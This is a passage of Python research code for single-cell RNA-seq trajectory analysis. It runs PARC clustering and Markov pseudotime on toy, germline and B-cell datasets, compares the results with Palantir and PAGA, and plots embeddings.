lineP0 = np.linspace(0, 1, len(set(p0.labels)))
lineP1 = np.linspace(0, 1, len(set(p1.labels)))
# find the single-cell which is nearest to the average-location of a terminal cluster - for just the sub-set of downsampled points in the corresponding PCA-space
new_tsi_list = []
# find the single-cell which is nearest to the average-location of a terminal cluster
# TODO make a knn in the downsampled PCA-space
X_ds = adata_counts.obsm['X_pca'][:, 0:ncomps][idx]
p_ds = hnswlib.Index(space='l2', dim=ncomps)
p_ds.init_index(max_elements=X_ds.shape[0], ef_construction=200, M=16)
p_ds.add_items(X_ds)
p_ds.set_ef(50)
for tsi_item in tsi_list:
labelsq, distances = p_ds.knn_query(adata_counts.obsm['X_pca'][:, 0:ncomps][tsi_item, :], k=1)
new_tsi_list.append(labelsq[0][0])
new_tsi_list = super_clus_ds_PCA_loc
# for old_tsi_i in tsi_list:
# temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
# labelsq, distances = p1.knn_struct.query(.knn_query(temp, k=1)
# print(labelsq[0])
# tsi_list.append(labelsq[0][0])
f, (ax1, ax2, ax3) = plt.subplots(1, 3, sharey=True)
ff, (ax11, ax22) = plt.subplots(1, 2, sharey=True)
col_i = 0
for color, group in zip(line, set(true_label)):
marker_x = marker[random.randint(0, 5)]
where = np.where(np.asarray(true_label) == group)[0]
# ax1.scatter(embedding[where, 0], embedding[where, 1], label=group, c=plt.cm.jet(color))
ax1.scatter(embedding[where, 0], embedding[where, 1], label=group, c=cc.glasbey_dark[col_i], marker=marker_x,
alpha=0.5)
col_i = col_i + 1
ax1.legend(fontsize=6)
ax1.set_title('true labels')
for color, group in zip(lineP0, set(p0.labels)):
where = np.where(super_labels == group)[0]
ax11.scatter(embedding[where, 0], embedding[where, 1], label=group,
c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax11.legend(fontsize=6)
ax11.set_title('p0 labels')
for color, group in zip(lineP1, set(p1.labels)):
where = np.where(labels == group)[0]
ax22.scatter(embedding[where, 0], embedding[where, 1], label=group,
c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax22.legend(fontsize=6)
ax22.set_title('p1 labels')
ax3.set_title("Markov Sim PT ncomps:" + str(ncomps) + '. knn:' + str(knn))
ax3.scatter(embedding[:, 0], embedding[:, 1], c=sc_pt_markov, cmap='viridis_r')
ax2.set_title("terminal clus from P0 super clus:" + str(ncomps) + '. knn:' + str(knn)+ 'randseed' +str( p0_random_seed))
ax2.scatter(embedding[:, 0], embedding[:, 1], c=sc_pt_markov, cmap='viridis_r')
jj = 0
for ti, ti_sub in zip(p1.revised_super_terminal_clusters, p1.terminal_clusters): # p0.terminal_clusters:
loc_i = np.where(super_labels == ti)[0]
val_pt = [sc_pt_markov[i] for i in loc_i]
th_pt = np.percentile(val_pt, 0) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
x = [embedding[xi, 0] for xi in loc_i]
y = [embedding[yi, 1] for yi in loc_i]
labelsq, distances = knn_hnsw.knn_query(np.array([np.mean(x), np.mean(y)]), k=1)
x = embedding[labelsq[0], 0]
y = embedding[labelsq[0], 1]
# ax2.scatter(np.mean(x), np.mean(y), label='ts' + str(ti)+'M'+str(maj), c='red', s=15)
# ax2.scatter(x, y, label='TS' + str(ti), c='red', s=10)
# ax3.scatter(x, y, label='TS' + str(ti), c='red', s=10)
print(super_clus_ds_PCA_loc[jj], 'super_clus_ds_PCA_loc[jj]', embedding[super_clus_ds_PCA_loc[jj],:])
ax2.scatter(embedding[super_clus_ds_PCA_loc[ti], 0], embedding[super_clus_ds_PCA_loc[ti], 1], label='TS' + str(ti), c='pink', s=18) # PCs HNSW
# ax3.scatter(embedding[new_tsi_list[jj], 0], embedding[new_tsi_list[jj], 1], label='TS' + str(p1.labels[tsi_list[jj]]), c='pink',s=18)
ax2.text(embedding[super_clus_ds_PCA_loc[ti], 0]+0.05, embedding[super_clus_ds_PCA_loc[ti], 1]+ 0.05, 'TS' + str(ti), color='black', zorder=3)
# ax3.text(np.mean(x) + 0.05, np.mean(y) + 0.05, 'TS' + str(ti), color='black', zorder=3)
ax2.legend(fontsize=6)
ax3.scatter(embedding[super_clus_ds_PCA_loc[ti], 0], embedding[super_clus_ds_PCA_loc[ti], 1],
label='TS' + str(ti), c='pink', s=18)
ax3.text(embedding[super_clus_ds_PCA_loc[ti], 0] + 0.05, embedding[super_clus_ds_PCA_loc[ti], 1] + 0.05,
'TS' + str(ti_sub), color='black', zorder=3)
jj = jj + 1
jj = 0
for ti in p1.terminal_clusters:
print('terminal ti', ti)
jj = jj + 1
draw_sc_evolution_trajectory_dijkstra(p1, embedding, knn_hnsw, p0.full_graph_shortpath, idx, adata_counts.obsm['X_pca'][:, 0:ncomps])
plt.show()
def main_Toy(ncomps = 100, knn = 30,random_seed=42):
dataset = "Toy3" # ""Toy1" # GermlineLi #Toy1
print('dataset, ncomps, knn, seed', dataset, ncomps,knn, random_seed)
## Dataset Germline Li https://zenodo.org/record/1443566#.XZlhEkEzZ5y
if dataset == "GermlineLine":
df_expression_ids = pd.read_csv("/home/shobi/Trajectory/Code/Rcode/germline_human_female_weeks_li.csv", 'rt',
delimiter=",")
print(df_expression_ids.shape)
# print(df_expression_ids[['cell_id',"week","ACTG2","STK31"]])[10:12]
df_counts = pd.read_csv("/home/shobi/Trajectory/Code/Rcode/germline_human_female_weeks_li_filteredcounts.csv",
'rt', delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Code/Rcode/germline_human_female_weeks_li_labels.csv", 'rt',
delimiter=",")
# print(df_counts.shape, df_counts.head() ,df_ids.shape)
# X_counts = df_counts.values
# print(X_counts.shape)
# varnames = pd.Categorical(list(df_counts.columns))
adata_counts = sc.AnnData(df_counts, obs=df_ids)
print(adata_counts.obs)
sc.pp.filter_cells(adata_counts, min_counts=1)
print(adata_counts.n_obs)
sc.pp.filter_genes(adata_counts, min_counts=1) # only consider genes with more than 1 count
print(adata_counts.X.shape)
sc.pp.normalize_per_cell( # normalize with total UMI count per cell
adata_counts, key_n_counts='n_counts_all')
print(adata_counts.X.shape, len(list(adata_counts.var_names)))
filter_result = sc.pp.filter_genes_dispersion( # select highly-variable genes
adata_counts.X, flavor='cell_ranger', n_top_genes=1000, log=False)
print(adata_counts.X.shape, len(list(adata_counts.var_names))) # , list(adata_counts.var_names))
adata_counts = adata_counts[:, filter_result.gene_subset]
print(adata_counts.X.shape, len(list(adata_counts.var_names))) # ,list(adata_counts.var_names))
# subset the genes
sc.pp.normalize_per_cell(adata_counts) # renormalize after filtering
sc.pp.log1p(adata_counts) # log transform: adata_counts.X = log(adata_counts.X + 1)
sc.pp.scale(adata_counts) # scale to unit variance and shift to zero mean
sc.tl.pca(adata_counts, svd_solver='arpack', n_comps=20)
true_label = list(adata_counts.obs['week'])
sc.pp.neighbors(adata_counts, n_neighbors=10, n_pcs=20)
sc.tl.draw_graph(adata_counts)
sc.pl.draw_graph(adata_counts, color='gender_week', legend_loc='right margin', palette='jet')
## Dataset Paul15 https://scanpy-tutorials.readthedocs.io/en/latest/paga-paul15.html
if dataset == 'Paul15':
root_user = "8Mk"
adata_counts = sc.datasets.paul15()
sc.pp.recipe_zheng17(adata_counts)
sc.tl.pca(adata_counts, svd_solver='arpack')
true_label = list(adata_counts.obs['paul15_clusters']) # PAUL
adata_counts.obs['group_id'] = true_label
# sc.pp.neighbors(adata_counts, n_neighbors=10)
# sc.tl.draw_graph(adata_counts)
# sc.pl.draw_graph(adata_counts, color=['paul15_clusters', 'Cma1'], legend_loc='on data')
if dataset.startswith('Toy'):
root_user = 'M1' # "T1_M1", "T2_M1"] #"T1_M1"
if dataset == "Toy1":
df_counts = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy1/toy_bifurcating_M4_n2000d1000.csv",
'rt', delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy1/toy_bifurcating_M4_n2000d1000_ids.csv",
'rt', delimiter=",")
if dataset == "Toy2":
df_counts = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy2/toy_multifurcating_n1000.csv", 'rt',
delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy2/toy_multifurcating_n1000_ids.csv", 'rt',
delimiter=",")
if dataset == "Toy3":
df_counts = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy3/toy_multifurcating_M8_n1000d1000.csv", 'rt',
delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy3/toy_multifurcating_M8_n1000d1000_ids.csv", 'rt',
delimiter=",")
start_cell = 'C107'
if dataset == "ToyCyclic":
df_counts = pd.read_csv("/home/shobi/Trajectory/Datasets/ToyCyclic/ToyCyclic_M5_n3000d1000.csv", 'rt',
delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Datasets/ToyCyclic/ToyCyclic_M5_n3000d1000_ids.csv", 'rt',
delimiter=",")
if dataset == "Toy4":
df_counts = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy4/toy_disconnected_M9_n1000d1000.csv", 'rt',
delimiter=",")
df_ids = pd.read_csv("/home/shobi/Trajectory/Datasets/Toy4/toy_disconnected_M9_n1000d1000_ids.csv", 'rt',
delimiter=",")
df_ids['cell_id_num'] = [int(s[1::]) for s in df_ids['cell_id']]
print("shape", df_counts.shape, df_ids.shape)
df_counts = df_counts.drop('Unnamed: 0', 1)
df_ids = df_ids.sort_values(by=['cell_id_num'])
df_ids = df_ids.reset_index(drop=True)
df_ids.to_csv("/home/shobi/Trajectory/Datasets/Toy3/toy_multifurcating_M8_n1000d1000_ids_sorted.csv")
true_label = df_ids['group_id']
adata_counts = sc.AnnData(df_counts, obs=df_ids)
# sc.pp.recipe_zheng17(adata_counts, n_top_genes=20) not helpful for toy data
sc.tl.pca(adata_counts, svd_solver='arpack', n_comps=ncomps)
'''
print(np.flatnonzero(adata_counts.obs['group_id'] == 'M1')[0]) #'T1_M1'
adata_counts.uns['iroot'] = np.flatnonzero(adata_counts.obs['group_id'] == 'M1')[0]
sc.pp.neighbors(adata_counts, n_neighbors=knn, n_pcs=ncomps)#4
sc.tl.draw_graph(adata_counts)
sc.pl.draw_graph(adata_counts, color='group_id', legend_loc='on data') #force-directed layout
start_dfmap = time.time()
sc.tl.diffmap(adata_counts, n_comps=ncomps)
print('time taken to get diffmap given knn', time.time() - start_dfmap)
sc.pp.neighbors(adata_counts, n_neighbors=knn, use_rep='X_diffmap')#4
sc.tl.draw_graph(adata_counts)
sc.pl.draw_graph(adata_counts, color='group_id', legend_loc='on data')
sc.tl.leiden(adata_counts, resolution=1.0)
sc.tl.paga(adata_counts, groups='leiden')
#sc.pl.paga(adata_counts, color=['louvain','group_id'])
sc.tl.dpt(adata_counts, n_dcs=ncomps)
sc.pl.paga(adata_counts, color=['leiden', 'group_id', 'dpt_pseudotime'], title=['leiden (knn:'+str(knn)+' ncomps:'+str(ncomps)+')', 'group_id (ncomps:'+str(ncomps)+')','pseudotime (ncomps:'+str(ncomps)+')'])
#X = df_counts.values
'''
print(palantir.__file__) #location of palantir source code
#counts = palantir.io.from_csv("/home/shobi/Trajectory/Datasets/Toy4/toy_disconnected_M9_n1000d1000.csv")
counts = palantir.io.from_csv("/home/shobi/Trajectory/Datasets/Toy3/toy_multifurcating_M8_n1000d1000.csv")
#counts = palantir.io.from_csv("/home/shobi/Trajectory/Datasets/ToyCyclic/ToyCyclic_M5_n3000d1000.csv")
print('counts',counts)
str_true_label = true_label.tolist()
str_true_label = [(i[1:]) for i in str_true_label]
str_true_label = pd.Series(str_true_label, index=counts.index)
norm_df = counts#palantir.preprocess.normalize_counts(counts)
pca_projections, _ = palantir.utils.run_pca(norm_df, n_components=ncomps)
dm_res = palantir.utils.run_diffusion_maps(pca_projections, n_components=ncomps, knn=knn)
ms_data = palantir.utils.determine_multiscale_space(dm_res) #n_eigs is determined using eigengap
tsne = palantir.utils.run_tsne(ms_data)
palantir.plot.plot_cell_clusters(tsne, str_true_label)
#C108 for M12 connected' #M8n1000d1000 start - c107 #c1001 for bifurc n2000d1000 #disconnected n1000 c108, "C1 for M10 connected" # c10 for bifurcating_m4_n2000d1000
print('ms data', ms_data)
pr_res = palantir.core.run_palantir(ms_data, start_cell, num_waypoints=500,knn=knn)
palantir.plot.plot_palantir_results(pr_res, tsne, n_knn = knn, n_comps=ncomps)
plt.show()
# clusters = palantir.utils.determine_cell_clusters(pca_projections)
'''
from sklearn.decomposition import PCA
pca = PCA(n_components=ncomps)
pc = pca.fit_transform(df_counts)
'''
p0 = PARC(adata_counts.obsm['X_pca'][:, 0:ncomps], true_label, jac_std_global=0.15, dist_std_local=1, knn=knn,
too_big_factor=0.3,
pseudotime=True, path="/home/shobi/Trajectory/Datasets/" + dataset + "/",
root_user=root_user, preserve_disconnected=True, dataset='toy',random_seed=random_seed) # *.4 root=2,
p0.run_PARC()
super_labels = p0.labels
super_edges = p0.edgelist
super_pt = p0.scaled_hitting_times # pseudotime pt
# 0.05 for p1 toobig
p = hnswlib.Index(space='l2', dim=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[1])
p.init_index(max_elements=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[0], ef_construction=200, M=16)
p.add_items(adata_counts.obsm['X_pca'][:, 0:ncomps])
p.set_ef(50)
tsi_list = [] # find the single-cell which is nearest to the average-location of a terminal cluster in PCA space (
for tsi in p0.terminal_clusters:
loc_i = np.where(np.asarray(p0.labels) == tsi)[0]
val_pt = [p0.single_cell_pt_markov[i] for i in loc_i]
th_pt = np.percentile(val_pt, 50) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
labelsq, distances = p.knn_query(temp, k=1)
print(labelsq[0])
tsi_list.append(labelsq[0][0])
p1 = PARC(adata_counts.obsm['X_pca'][:, 0:ncomps], true_label, jac_std_global=.15, dist_std_local=1, knn=knn,
too_big_factor=0.05,
path="/home/shobi/Trajectory/Datasets/" + dataset + "/", pseudotime=True,
super_cluster_labels=super_labels, super_node_degree_list=p0.node_degree_list,
super_terminal_cells=tsi_list, root_user=root_user,
x_lazy=0.99, alpha_teleport=0.99, preserve_disconnected=True, dataset='toy',
super_terminal_clusters=p0.terminal_clusters, random_seed=random_seed) #root=1,
# in the case of TOY DATA: P1 WORKS MUCH BETTER WHEN ONLY USING SUPER_TERMINAL_CLUS... O/W need to omit pruning
p1.run_PARC()
labels = p1.labels
# p1 = PARC(adata_counts.obsm['X_pca'], true_label, jac_std_global=1, knn=5, too_big_factor=0.05, anndata= adata_counts, small_pop=2)
# p1.run_PARC()
# labels = p1.labels
print('start tsne')
n_downsample = 500
if len(labels) > n_downsample:
# idx = np.random.randint(len(labels), size=900)
np.random.seed(2357)
idx = np.random.choice(a=np.arange(0, len(labels)), size=990, replace=False, p=None)
print('len idx', len(idx))
super_labels = np.asarray(super_labels)[idx]
labels = list(np.asarray(labels)[idx])
true_label = list(np.asarray(true_label[idx]))
sc_pt_markov = list(np.asarray(p1.single_cell_pt_markov[idx]))
graph = p0.knngraph_visual(adata_counts.obsm['X_pca'][idx, :], downsampled=True)
embedding = p0.run_umap_hnsw(adata_counts.obsm['X_pca'][idx, :], graph)
#embedding = TSNE().fit_transform(adata_counts.obsm['X_pca'][idx, :])
print('tsne downsampled size', embedding.shape)
else:
embedding = TSNE().fit_transform(pc) # (adata_counts.obsm['X_pca'])
print('tsne input size', adata_counts.obsm['X_pca'].shape)
# embedding = umap.UMAP().fit_transform(adata_counts.obsm['X_pca'])
idx = np.random.randint(len(labels), size=len(labels))
print('end tsne')
knn_hnsw, ci_list = sc_loc_ofsuperCluster_embeddedspace(embedding, p0, p1, idx)
draw_trajectory_gams(embedding, ci_list, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p0.terminal_clusters, sub_terminal_clusters=p1.terminal_clusters,
title_str='Hitting times: Markov Simulation on biased edges', ncomp=ncomps)
plt.show()
draw_trajectory_dimred(embedding, ci_list, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p0.terminal_clusters,
title_str='Hitting times: Markov Simulation on biased edges', ncomp=ncomps)
plt.show()
num_group = len(set(true_label))
line = np.linspace(0, 1, num_group)
f, (ax1, ax3) = plt.subplots(1, 2, sharey=True)
for color, group in zip(line, set(true_label)):
where = np.where(np.asarray(true_label) == group)[0]
ax1.scatter(embedding[where, 0], embedding[where, 1], label=group,
c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax1.legend(fontsize=6)
ax1.set_title('true labels')
ax3.set_title("Markov Sim PT ncomps:" + str(pc.shape[1]) + '. knn:' + str(knn))
ax3.scatter(embedding[:, 0], embedding[:, 1], c=sc_pt_markov, cmap='viridis_r')
plt.show()
#draw_sc_evolution_trajectory_dijkstra(p1, embedding, knn_hnsw, p0.full_graph_shortpath, idx, adata_counts.obsm['X_pca'][:, 0:ncomps])
plt.show()
def main_Bcell(ncomps, knn, random_seed):
print('ncomp, knn, random seed', ncomps, knn, random_seed)
#https://github.com/STATegraData/STATegraData
def run_zheng(adata, min_counts=3, n_top_genes=500,do_HVG=True):
sc.pp.filter_genes(adata, min_counts=min_counts)
# sc.pp.filter_genes(adata, min_cells=3)# only consider genes with more than 1 count
'''
sc.pp.normalize_per_cell( # normalize with total UMI count per cell
adata, key_n_counts='n_counts_all')
'''
sc.pp.normalize_total(adata, target_sum=1e4)
if do_HVG == True:
sc.pp.log1p(adata)
'''
filter_result = sc.pp.filter_genes_dispersion( # select highly-variable genes
adata.X, flavor='cell_ranger', n_top_genes=n_top_genes, log=False )
adata = adata[:, filter_result.gene_subset] # subset the genes
'''
sc.pp.highly_variable_genes(adata, n_top_genes=n_top_genes, min_mean=0.0125, max_mean=3, min_disp=0.5)
print('len hvg ',sum(adata.var.highly_variable))
adata = adata[:, adata.var.highly_variable]
sc.pp.normalize_per_cell(adata) # renormalize after filtering
#if do_log: sc.pp.log1p(adata) # log transform: adata.X = log(adata.X + 1)
if do_HVG==False: sc.pp.log1p(adata)
sc.pp.scale(adata, max_value=10) # scale to unit variance and shift to zero mean
return adata
def run_paga_func_Bcell(adata_counts1, ncomps, knn, embedding):
# print('npwhere',np.where(np.asarray(adata_counts.obs['group_id']) == '0')[0][0])
adata_counts = adata_counts1.copy()
sc.tl.pca(adata_counts, svd_solver='arpack', n_comps=ncomps)
adata_counts.uns['iroot'] = 33 # np.where(np.asarray(adata_counts.obs['group_id']) == '0')[0][0]
sc.pp.neighbors(adata_counts, n_neighbors=knn, n_pcs=ncomps) # 4
sc.tl.draw_graph(adata_counts)
sc.pl.draw_graph(adata_counts, color='group_id', legend_loc='on data') # force-directed layout
start_dfmap = time.time()
sc.tl.diffmap(adata_counts, n_comps=ncomps)
print('time taken to get diffmap given knn', time.time() - start_dfmap)
sc.pp.neighbors(adata_counts, n_neighbors=knn, use_rep='X_diffmap') # 4
sc.tl.draw_graph(adata_counts)
sc.pl.draw_graph(adata_counts, color='group_id', legend_loc='on data')
sc.tl.leiden(adata_counts, resolution=1.0)
sc.tl.paga(adata_counts, groups='leiden')
# sc.pl.paga(adata_counts, color=['louvain','group_id'])
sc.tl.dpt(adata_counts, n_dcs=ncomps)
sc.pl.paga(adata_counts, color=['leiden', 'group_id', 'dpt_pseudotime'],
title=['leiden (knn:' + str(knn) + ' ncomps:' + str(ncomps) + ')',
'group_id (ncomps:' + str(ncomps) + ')', 'pseudotime (ncomps:' + str(ncomps) + ')'])
sc.pl.draw_graph(adata_counts, color='dpt_pseudotime', legend_loc='on data')
print('dpt format', adata_counts.obs['dpt_pseudotime'])
plt.scatter(embedding[:, 0], embedding[:, 1], c=adata_counts.obs['dpt_pseudotime'].values, cmap='viridis')
plt.title('PAGA DPT')
plt.show()
def run_palantir_func_Bcell(ad1, ncomps, knn, tsne_X, true_label):
ad = ad1.copy()
tsne = pd.DataFrame(tsne_X, index=ad.obs_names, columns=['x', 'y'])
norm_df_pal = pd.DataFrame(ad.X)
new = ['c' + str(i) for i in norm_df_pal.index]
norm_df_pal.columns = [i for i in ad.var_names]
# print('norm df', norm_df_pal)
norm_df_pal.index = new
pca_projections, _ = palantir.utils.run_pca(norm_df_pal, n_components=ncomps)
sc.tl.pca(ad, svd_solver='arpack')
dm_res = palantir.utils.run_diffusion_maps(pca_projections, n_components=ncomps, knn=knn)
ms_data = palantir.utils.determine_multiscale_space(dm_res) # n_eigs is determined using eigengap
print('ms data shape: determined using eigengap', ms_data.shape)
# tsne = pd.DataFrame(tsnem)#palantir.utils.run_tsne(ms_data)
tsne.index = new
# print(type(tsne))
str_true_label = pd.Series(true_label, index=norm_df_pal.index)
palantir.plot.plot_cell_clusters(tsne, str_true_label)
start_cell = 'c42' # '#C108 for M12 connected' #M8n1000d1000 start - c107 #c1001 for bifurc n2000d1000 #disconnected n1000 c108, "C1 for M10 connected" # c10 for bifurcating_m4_n2000d1000
pr_res = palantir.core.run_palantir(ms_data, early_cell=start_cell, num_waypoints=1200, knn=knn)
palantir.plot.plot_palantir_results(pr_res, tsne, n_knn=knn, n_comps=ncomps)
imp_df = palantir.utils.run_magic_imputation(norm_df_pal, dm_res)
Bcell_marker_gene_list = ['Igll1','Myc', 'Ldha', 'Foxo1', 'Lig4']#, 'Slc7a5']#,'Slc7a5']#,'Sp7','Zfp629']
gene_trends = palantir.presults.compute_gene_trends(pr_res, imp_df.loc[:, Bcell_marker_gene_list])
palantir.plot.plot_gene_trends(gene_trends)
plt.show()
def find_time(s):
start = s.find("Ik") + len("Ik")
end = s.find("h")
return int(s[start:end])
def find_cellID(s):
start = s.find("h") + len("h")
end = s.find("_")
return s[start:end]
diff = pd.read_excel('/home/shobi/Downloads/journal_bgenes.xlsx', sep='\t')
is_diff = diff['CONSENSUS_DE']==1
diff = diff[is_diff]
print('shape dff', diff.shape)
diff_list = diff['MGI_Symbol'].values.tolist()
diff_list = [i for i in diff_list if isinstance(i, str) ]
print('len diff list', len(diff_list))
Bcell = pd.read_csv('/home/shobi/Trajectory/Datasets/Bcell/genes_count_table.txt', sep='\t')
gene_name = pd.read_csv('/home/shobi/Trajectory/Datasets/Bcell/genes_attr_table.txt', sep='\t')
Bcell_columns = [i for i in Bcell.columns]
adata_counts = sc.AnnData(Bcell.values[:, 1:].T)
Bcell_columns.remove('tracking_id')
print(gene_name.shape, gene_name.columns)
Bcell['gene_short_name'] = gene_name['gene_short_name']
adata_counts.var_names = gene_name['gene_short_name']
adata_counts.obs['TimeCellID'] = Bcell_columns
time_list = [find_time(s) for s in Bcell_columns]
#for ii, jj in enumerate(time_list):
#print(ii, jj)
print('time list set', set(time_list))
adata_counts.obs['TimeStamp'] =[str(tt) for tt in time_list]
# for i in Bcell_columns:
# print(i)
# adata_counts.var_names_make_unique()
ID_list = [find_cellID(s) for s in Bcell_columns]
adata_counts.obs['group_id'] = [str(i) for i in time_list]
ID_dict = {}
color_dict = {}
for j, i in enumerate(list(set(ID_list))):
ID_dict.update({i: j})
for j, i in enumerate(list(set(time_list))):
color_dict.update({i: j})
print('shape of raw data', adata_counts.shape)
# sc.pp.filter_genes(adata_counts, min_counts=3)
adata_counts_unfiltered = adata_counts.copy()
Bcell_marker_gene_list = ['Myc', 'Igll1', 'Slc7a5', 'Ldha', 'Foxo1', 'Lig4']
small_large_gene_list = ['Kit','Pcna','Ptprc','Il2ra','Vpreb1','Cd24a','Igll1','Cd79a','Cd79b','Mme', 'Spn']
list_var_names = [s for s in adata_counts_unfiltered.var_names]
matching = [s for s in list_var_names if "IgG" in s]
print('matching', matching)
for gene_name in Bcell_marker_gene_list:
print('gene name', gene_name)
loc_gata = np.where(np.asarray(adata_counts_unfiltered.var_names) == gene_name)[0][0]
for gene_name in small_large_gene_list:
print('looking at small-big list')
print('gene name', gene_name)
loc_gata = np.where(np.asarray(adata_counts_unfiltered.var_names) == gene_name)[0][0]
#diff_list = [i for i in diff_list if i in list_var_names] #based on paper STable1 https://journals.plos.org/plosbiology/article?id=10.1371/journal.pbio.2006506#pbio.2006506.s007
#adata_counts = adata_counts[:,diff_list] #if using these, then set do-HVG to False
print('adata counts difflisted', adata_counts.shape)
adata_counts = run_zheng(adata_counts, n_top_genes=5000, min_counts=30, do_HVG=True) #5000 for better ordering
print('adata counts shape', adata_counts.shape)
# sc.pp.recipe_zheng17(adata_counts)
# (ncomp=50, knn=20 gives nice results. use 10PCs for visualizing)
marker_genes = {"small": [ 'Rag2','Rag1','Pcna','Myc','Ccnd2','Cdkn1a','Smad4','Smad3', 'Cdkn2a'],#B220 = Ptprc, PCNA negative for non cycling
"large": ['Ighm','Kit', 'Ptprc','Cd19','Il2ra','Vpreb1','Cd24a','Igll1','Cd79a','Cd79b'],
"Pre-B2": ['Mme', 'Spn']} #'Cd19','Cxcl13',,'Kit'
print('make the p0 matrix plot')
mplot_adata = adata_counts_unfiltered.copy()
mplot_adata = run_zheng(mplot_adata, n_top_genes=25000, min_counts=1,do_HVG = False)
#mplot_adata.X[mplot_adata.X>10] =10
#mplot_adata.X[mplot_adata.X< -1] = -1
sc.pl.matrixplot(mplot_adata, marker_genes, groupby='TimeStamp')
sc.tl.pca(adata_counts, svd_solver='arpack', n_comps=ncomps)
#sc.pl.pca_variance_ratio(adata_counts, log=True)
jet = cm.get_cmap('viridis', len(set(time_list)))
cmap_ = jet(range(len(set(time_list))))
jet2 = cm.get_cmap('jet', len(set(ID_list)))
cmap2_ = jet2(range(len(set(ID_list))))
# color_dict = {"0": [0], "2": [1], "6": [2], "12": [3], "18": [4], "24": [5]}
#sc.pl.heatmap(mplot_adata, var_names = small_large_gene_list,groupby = 'TimeStamp', dendrogram = True)
embedding = umap.UMAP(random_state=42, n_neighbors=15, init='random').fit_transform(
adata_counts.obsm['X_pca'][:, 0:5])
f, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4, sharey=True)
for i in list(set(time_list)):
loc = np.where(np.asarray(time_list) == i)[0]
ax4.scatter(embedding[loc, 0], embedding[loc, 1], c=cmap_[color_dict[i]], alpha=1, label=str(i))
if i ==0:
for xx in range(len(loc)):
poss = loc[xx]
ax4.text(embedding[poss,0],embedding[poss,1], 'c'+str(xx))
ax4.legend()
ax1.scatter(embedding[:, 0], embedding[:, 1], c=mplot_adata[:,'Pcna'].X.flatten(), alpha=1)
ax1.set_title('Pcna, cycling')
ax2.scatter(embedding[:, 0], embedding[:, 1], c=mplot_adata[:,'Vpreb1'].X.flatten(), alpha=1)
ax2.set_title('Vpreb1')
ax3.scatter(embedding[:, 0], embedding[:, 1], c=mplot_adata[:,'Cd24a'].X.flatten(), alpha=1)
ax3.set_title('Cd24a')
#ax2.text(embedding[i, 0], embedding[i, 1], str(i))
'''
for i, j in enumerate(list(set(ID_list))):
loc = np.where(np.asarray(ID_list) == j)
if 'r'in j: ax2.scatter(embedding[loc, 0], embedding[loc, 1], c=cmap2_[i], alpha=1, label=str(j), edgecolors = 'black' )
else: ax2.scatter(embedding[loc, 0], embedding[loc, 1], c=cmap2_[i], alpha=1, label=str(j))
'''
# plt.show()
true_label = time_list
# run_paga_func_Bcell(adata_counts, ncomps, knn, embedding)
#run_palantir_func_Bcell(adata_counts, ncomps, knn, embedding, true_label)
print('input has shape', adata_counts.obsm['X_pca'].shape)
input_via = adata_counts.obsm['X_pca'][:, 0:ncomps]
p0 = PARC(input_via, true_label, jac_std_global=0.15, dist_std_local=1, knn=knn,
too_big_factor=0.3, dataset='bcell',
pseudotime=True, path="/home/shobi/Trajectory/Datasets/" + 'bcell' + "/",
root_user=42, preserve_disconnected=True, random_seed=random_seed, do_magic_bool=True) # *.4#root_user = 34
p0.run_PARC()
super_labels = p0.labels
'''
umap_init_ = p0.graph_node_pos
umap_init_ = np.asarray(umap_init_)
umap_init = np.random.rand(len(super_labels),2)
for clus_i in range(umap_init_.shape[0]):
loc_clus_i = np.where(np.asarray(super_labels) == clus_i)[0]
umap_init[loc_clus_i,0]=umap_init_[clus_i,0]
umap_init[loc_clus_i, 1] = umap_init_[clus_i, 1]
'''
p = hnswlib.Index(space='l2', dim=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[1])
p.init_index(max_elements=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[0], ef_construction=100, M=16)
p.add_items(adata_counts.obsm['X_pca'][:, 0:ncomps])
p.set_ef(30)
tsi_list = [] # find the single-cell which is nearest to the average-location of a terminal cluster in PCA space (
for tsi in p0.terminal_clusters:
loc_i = np.where(np.asarray(p0.labels) == tsi)[0]
val_pt = [p0.single_cell_pt_markov[i] for i in loc_i]
th_pt = np.percentile(val_pt, 50) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
labelsq, distances = p.knn_query(temp, k=1)
print(labelsq[0])
tsi_list.append(labelsq[0][0])
p1 = PARC(adata_counts.obsm['X_pca'][:, 0:ncomps], true_label, jac_std_global=0.15, dist_std_local=1, knn=knn,
too_big_factor=0.05,
path="/home/shobi/Trajectory/Datasets/" + "bcell/", pseudotime=True,
super_cluster_labels=super_labels, super_node_degree_list=p0.node_degree_list,
super_terminal_cells=tsi_list, root_user=42,
x_lazy=0.99, alpha_teleport=0.99, preserve_disconnected=True, dataset='bcell',
super_terminal_clusters=p0.terminal_clusters, random_seed=random_seed)
p1.run_PARC()
labels = p1.labels
super_edges = p0.edgelist
# plot gene expression vs. pseudotime
